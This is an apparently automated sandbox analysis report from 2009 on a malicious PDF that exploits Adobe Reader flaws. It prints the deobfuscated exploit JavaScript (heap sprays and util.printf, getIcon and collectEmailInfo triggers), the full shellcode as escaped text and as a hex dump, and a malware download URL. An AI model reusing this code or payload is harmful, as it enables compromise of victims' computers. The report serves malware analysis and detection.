Analysis report for 666.pdf
Sample Overview
| File | 666.pdf |
|---|
| MD5 | 8b1a51743f4579cb8a338215acae5318 |
|---|
| Analysis Started | 2009-07-22 09:47:38 |
|---|
| Report Generated | 2009-07-22 09:47:45 |
|---|
| Jsand version | 1.03.02 |
|---|
Detection results
| Detector | Result |
|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |
Deobfuscation results
Evals
for (i = 0; i < s.length; i ++ ){
p += String.fromCharCode(s[i] - 15);
}
var payload = unescape("%u0A0A%u0A0A%u0A0A" + "
%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9
%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE
%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA
%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040
%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121
%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9
%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720
%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F
%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA
%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112
%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6
%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121
%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0
%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520
%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D
%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE
%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A
%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B
%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121
%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A
%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120
%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123
%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971
%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921
%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7
%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971
%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125
%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121
%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120
%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121
%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120
%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121
%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120
%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE
%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121
%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE
%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121
%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE
%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121
%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE
%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88
%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9
%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961
%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924
%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1
%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B
%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u520E%u534A
%u4F40%u4455%u0F4F%u4E42%u0E4C%u4851%u0E42%u5B54%u0F51%u4951%u2151%u2121%u2121%u2121%u2121
%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121
%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121
%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021");
//-------
var memory;
function New_Script(payload){
//var payload;
//if(adobe9)//adobe reader 8 works also with app.setTimeOut?
//var startwith = app.alert('Hi');//required for adobe9
var nop = unescape(
"\%u9090\%u9090");
//long nop will also force the address to go to 0x90909090 so 2 steps in one ;)
var
shellcode = payload;
while (nop.length <= 0x100000 / 2)nop += nop;
nop = nop.substring(0, 0x100000 / 2 - shellcode.length);
memory = new Array();
for (i = 0; i < 0x6ff0; i ++ )//we should at least overwrite 0x90909090
{
memory[i] = nop + shellcode;
}
//start exploit now
start();
function start2(){
this .getAnnots( - 134217728 ,- 134217728 ,- 134217728 ,- 134217728);
}
function start(){
this .spell.customDictionaryOpen(0, nop);
//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second para
m to go to 0x41414141 ;)
}
}
//-------
var arry = new Array();
function fix_it(yarsp, len){
while (yarsp.length * 2 < len){
yarsp += yarsp;
}
yarsp = yarsp.substring(0, len / 2);
return yarsp;
}
var version = app.viewerVersion;
if (version > 8){
var payload;
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize + heapblock.length;
while (bigblock.length < spray)bigblock += bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 0x40000)block = block + block + fillblock;
mem = new Array();
for (i = 0; i < 1400; i ++ )mem[i] = block + heapblock;
var num =
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
util.printf("%45000f", num);
}
if (version < 8){
var payload;
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = payload.length * 2;
var len = addr - (sc_len + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000) / addr;
for (var count = 0; count < count2; count ++ ){
mem_array[count] = yarsp + payload;
}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952)overflow += overflow;
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : overflow
}
);
}
if (version < 9.1){
if (app.doc.Collab.getIcon){
var payload;
var hWq500CN = payload.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + payload;
}
var tUMhNbGw = unescape("%09");
while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw;
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
if (version >= 9){
var payload;
New_Script(payload);
}
Writes
No writes.
Network Activity
Requests
ActiveX controls
-
| AcrobatJavaScript |
|---|
|
Name |
Arg0 |
Arg1 |
Count |
| Methods |
Collab.getIcon |
N...............................................................................
................................................................................
................................................................................
other 15840 bytes
................................................................................
................................................................................
................................................................................
.................................................................. |
|
1 |
| util.printf |
%45000f |
1.3E295 |
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
|---|
0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a d9 e1
d9 34 24 58 58 58 58 33 db b3 1c 03 c3 31 c9 66
81 e9 65 fa 80 30 21 40 e2 fa c9 17 22 21 21 49
21 01 21 21 4b 21 de f1 98 21 31 21 21 aa d9 ca
24 7f d2 85 de f1 c9 d7 de de de c9 1c 22 21 21
aa d9 c9 19 21 21 21 c9 6c 20 21 21 c9 67 21 21
21 c9 fa 22 21 21 aa d9 c9 03 21 21 21 c9 65 20
21 21 c9 11 21 21 21 c9 a8 22 21 21 aa d9 c9 2d
21 21 21 c9 40 20 21 21 c9 3b 21 21 21 ca 79 72
aa fd 72 4b 61 49 21 31 21 21 76 c9 90 23 21 21
c9 c4 21 21 21 79 e2 72 aa fd 72 4b 01 49 21 31
21 21 76 c9 b8 23 21 21 c9 ec 21 21 21 79 e2 76
c9 1d 25 21 21 aa d9 12 e8 68 12 e1 91 e2 dd d3
8f ac 66 de 7e e2 7a 1f e7 26 99 1f a8 7e 20 47
1f e6 66 24 de c1 e2 c8 b4 25 21 21 7a a0 cd 35
20 21 21 aa f5 1f e6 23 42 4c 45 01 1f e6 63 25
0e 42 01 03 a2 e3 29 12 e1 71 71 49 25 20 21 21
73 72 71 c9 e0 22 21 21 de f1 aa dd aa e6 a2 e1
29 1f ab 39 a5 fa 55 22 61 ca d7 1f e7 21 03 12
f3 1f a9 71 20 a2 cd 75 12 e1 12 fa aa ed a2 d9
75 5c 28 1f a8 3d 20 a2 e1 25 ca d3 aa ed aa f8
a2 e2 31 12 e1 1f e6 62 0d 20 21 21 21 70 72 71
71 71 71 71 71 76 71 c9 18 22 21 21 c9 38 21 21
21 45 80 25 21 21 21 ac 81 41 de de de c9 16 22
21 21 12 fa 72 72 72 72 de f1 a1 19 c9 a1 19 c8
54 2e a0 59 24 b1 b1 b1 b1 55 27 74 aa cd ac 61
24 de c1 c9 0f de de de e2 c9 09 de de de 99 30
20 25 a1 e3 2d 21 c9 3a de de de 12 e1 71 75 c9
75 21 21 21 71 c9 aa 23 21 21 de f1 17 a1 1d 05
21 56 2b c9 60 23 21 21 12 de 76 de f1 c9 da 20
21 21 49 de 21 21 21 de f1 c9 c9 df de de 72 76
77 12 e1 71 75 c9 3f 21 21 21 71 c9 74 23 21 21
de f1 17 a1 1d 05 21 56 2b c9 2a 23 21 21 12 de
76 de f1 79 7f 7e 7a e2 ca 23 79 e2 c9 d8 de de
de 77 76 a2 cd 29 aa dd 4b 29 76 1f de 56 35 c9
7c 23 21 21 de f1 aa dd 49 40 4c 44 21 49 68 64
67 53 aa d5 98 29 21 21 21 d2 87 54 0e 4b 21 1f
de 55 05 01 c9 05 23 21 21 de f1 aa d9 c9 ea 20
21 21 de f1 1a d9 55 29 17 aa 65 05 01 1f de 21
1f de 55 05 3d c9 ce 20 21 21 de f1 a2 e5 31 7e
7f 99 20 21 21 21 e2 49 4e 4f 21 21 49 54 53 4d
4c ca 34 ac 65 05 25 71 c9 03 df de de 71 c9 6b
23 21 21 c8 c3 df de de c9 c7 de de de a2 e5 29
e2 4b 4d 49 4f 55 45 4d ca 34 ac 65 05 25 71 c9
da dc de de 71 c9 02 23 21 21 c8 9a df de de c9
c7 de de de a2 e5 29 e2 49 12 13 21 21 49 54 52
44 53 ca 34 ac 65 05 25 71 c9 f0 dc de de 71 c9
d8 20 21 21 c8 b0 df de de c9 c7 de de de a2 e5
29 e2 49 42 57 56 21 49 52 49 45 4e ca 34 ac 65
05 25 71 c9 86 dc de de 71 c9 ee 20 21 21 c8 46
df de de c9 c7 de de de a2 e5 29 e2 49 57 46 59
21 ca 34 ac 65 05 25 71 c9 a3 dc de de 71 c9 8b
20 21 21 c8 63 df de de c9 c7 de de de a2 e5 25
e2 c9 8a 20 21 21 49 3a e7 67 58 71 c9 e7 20 21
21 a2 e5 29 e2 c9 b6 20 21 21 49 cd b6 22 2d 71
c9 93 20 21 21 a2 e5 29 e2 c9 a2 20 21 21 49 8b
dd 2c 5d 71 c9 bf 20 21 21 a2 e5 29 e2 c9 4e 20
21 21 49 cc 77 ce 17 71 c9 ab 20 21 21 a2 e5 29
e2 c9 7a 20 21 21 49 d1 ab 25 7e 71 c9 57 20 21
21 a2 e5 29 e2 c9 d6 df de de 49 59 49 fa 3d 71
c9 43 20 21 21 a2 e5 29 e2 c9 12 20 21 21 49 ce
ef c1 41 71 c9 6f 20 21 21 a2 e5 29 e2 c9 3e 20
21 21 49 91 68 0c fa 71 c9 1b 20 21 21 a2 e5 29
e2 c9 17 de de de 49 8a 7f ba 3f 71 c9 07 20 21
21 a2 e5 29 e2 c9 86 df de de 49 78 b6 a0 23 71
c9 33 20 21 21 a2 e5 29 e2 c9 c2 21 21 21 49 5f
f9 c3 52 71 c9 df 21 21 21 a2 e5 29 e2 c9 ee 21
21 21 49 bf d8 9a 14 71 c9 cb 21 21 21 a2 e5 29
e2 c9 b3 df de de 49 76 81 94 9a 71 c9 f7 21 21
21 a2 e5 29 e2 c9 5f df de de 49 3b 5b 3f 23 71
c9 e3 21 21 21 a2 e5 29 e2 c9 4b df de de 49 c1
7a 11 b5 71 c9 8f 21 21 21 a2 e5 29 e2 c9 77 df
de de 49 b6 e8 c3 82 71 c9 bb 21 21 21 a2 e5 29
e2 c9 63 df de de 49 49 05 e4 92 71 c9 a7 21 21
21 a2 e5 29 e2 c9 76 21 21 21 49 53 df 92 37 71
c9 53 21 21 21 a2 e5 29 e2 c9 65 df de de ca 32
4b 44 71 c9 d6 da de de 71 c9 8a df de de c8 96
dd de de c9 c9 de de de e2 c9 88 dc de de 49 6e
ce 6e 24 71 c9 1f 21 21 21 a2 e5 29 e2 c9 2e 21
21 21 49 af 6f 2f cd 71 c9 0b 21 21 21 a2 e5 29
e2 12 e1 45 aa 61 11 a4 e1 59 31 1f aa 61 2d 1f
aa 51 3d 8c 1f aa 61 29 e2 ca 2a 1f aa 61 15 a2
e1 5d 1f aa 61 1d e2 41 17 aa 4d 05 05 17 aa 64
1d 17 aa 75 24 59 22 f4 1f aa 6b 39 1f aa 7b 01
22 fc c2 1a 68 1f aa 15 aa 22 d4 12 de 12 e1 dd
8d a5 e1 55 26 e0 ee 2c 22 d9 ca d5 17 1a 5d 05
09 54 fe 1f aa 7b 05 22 fc 47 1f aa 2d 6a 1f aa
7b 3d 22 fc 1f aa 25 aa 22 e4 17 a8 65 05 3d 40
e2 c9 47 da de de 49 55 55 51 1b 0e 0e 52 4a 53
40 4f 55 44 4f 0f 42 4e 4c 0e 51 48 42 0e 54 5b
51 0f 51 49 51 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 00 | ................
.4$XXXX3.....1.f
..e..0!@...."!!I
!.!!K!...!1!!...
$............"!!
....!!!.l !!.g!!
!.."!!....!!!.e
!!..!!!.."!!...-
!!!.@ !!.;!!!.yr
..rKaI!1!!v..#!!
..!!!y.r..rK.I!1
!!v..#!!..!!!y.v
..%!!....h......
..f.~.z..&...~ G
..f$.....%!!z..5
!!....#BLE...c%
.B....)..qqI% !!
srq.."!!........
)..9..U"a....!..
...q ..u........
u\(..= ..%......
..1....b. !!!prq
qqqqqvq.."!!.8!!
!E.%!!!..A....."
!!..rrrr........
T..Y$....U't...a
$..............0
%..-!.:.....qu.
u!!!q..#!!......
!V+.`#!!..v....
!!I.!!!.......rv
w..qu.?!!!q.t#!!
......!V+.*#!!..
v..y.~z..#y.....
.wv..)..K)v..V5.
|#!!....I@LD!Ihd
gS...)!!!..T.K!.
.U....#!!......
!!....U)..e....!
..U.=.. !!....1~
.. !!!.INO!!ITSM
L.4.e.%q.....q.k
#!!............)
.KMIOUEM.4.e.%q.
....q..#!!......
......).I..!!ITR
DS.4.e.%q.....q.
. !!............
).IBWV!IRIEN.4.e
.%q.....q.. !!.F
..........).IWFY
!.4.e.%q.....q..
!!.c..........%
... !!I:.gXq.. !
!..)... !!I.."-q
.. !!..)... !!I.
.,]q.. !!..)..N
!!I.w..q.. !!..)
..z !!I..%~q.W !
!..)......IYI.=q
.C !!..)... !!I.
..Aq.o !!..)..>
!!I.h..q.. !!..)
......I...?q.. !
!..)......Ix..#q
.3 !!..)...!!!I_
..Rq..!!!..)...!
!!I....q..!!!..)
......Iv...q..!!
!..).._...I;[?#q
..!!!..)..K...I.
z..q..!!!..)..w.
..I....q..!!!..)
..c...II...q..!!
!..)..v!!!IS..7q
.S!!!..)..e....2
KDq.....q.......
..............In
.n$q..!!!..)...!
!!I.o/.q..!!!..)
...E.a...Y1..a-.
.Q=...a)..*..a..
.]..a..A..M....d
...u$Y"...k9..{.
"...h...."......
...U&..,".....].
.T...{.".G..-j..
{="...%."...e.=@
..G...IUUQ...RJS
@OUDO.BNL.QHB.T[
Q.QIQ!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!. |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|
| http://skranten.com/pic/uzp.php |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
ce03c95ab093fa038c0224a3e6187a65 |
|